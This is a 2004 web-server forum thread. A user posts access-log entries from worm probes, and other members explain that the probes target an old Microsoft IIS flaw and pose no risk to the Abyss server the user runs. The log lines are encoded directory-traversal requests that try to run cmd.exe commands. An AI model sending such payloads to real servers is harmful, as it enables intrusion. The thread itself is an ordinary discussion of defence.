I been hacked?

 
Post new topic   Reply to topic    Aprelium Forum Index -> Networking Issues
View previous topic :: View next topic  
Author Message
Arnyek
-


Joined: 07 Jan 2004
Posts: 1

PostPosted: Wed Jan 07, 2004 4:50 am    Post subject: I been hacked? Reply with quote

Hello Everyone!
I just installed this nice webserver on my system to share some pictures with my friends at overseas.
First day I find it in my log numerouse times from differrent IP addresses :
24.101.196.* - - [06/Jan/2004:21:28:06 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:08 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:14 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:17 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:19 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:20 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:26 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:28 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:30 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:35 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""

Should I be worry, or is there anyway I can prevent this kind of attac in the future?
Sorry if I am posting in the wrong group.
I really appreciated if someone can give me advice or send me a link so I can learn about it.

Thanks

Arnyek
Back to top View user's profile Send private message
Axis
-


Joined: 29 Sep 2003
Posts: 336

PostPosted: Wed Jan 07, 2004 5:34 am    Post subject: Reply with quote

Hi Arnyek--

No, you have not been hacked. What you are seeing is the footprints of the Code Red or sadmind/IIS virus, which is quite old and mainly geered to an old FrontPage vulnerability. You are on Abyss so you have no problems with this. It is weird there are still machines out there with this (in internet time) ancient virus!

Regards,
Axis
Back to top View user's profile Send private message
Anonymoose
-


Joined: 09 Sep 2003
Posts: 2192

PostPosted: Wed Jan 07, 2004 10:06 am    Post subject: Reply with quote

It's actually targetting a Microsoft IIS vulnerability, you're using Abyss not IIS, so nothing to worry about :D

http://www.aprelium.com/forum/viewtopic.php?t=2768
http://www.aprelium.com/forum/viewtopic.php?t=2749
Back to top View user's profile Send private message
Axis
-


Joined: 29 Sep 2003
Posts: 336

PostPosted: Wed Jan 07, 2004 4:34 pm    Post subject: Reply with quote

Anonymoose--

I stand corrected about IIS.

Regards,
Axis
Back to top View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> Networking Issues All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group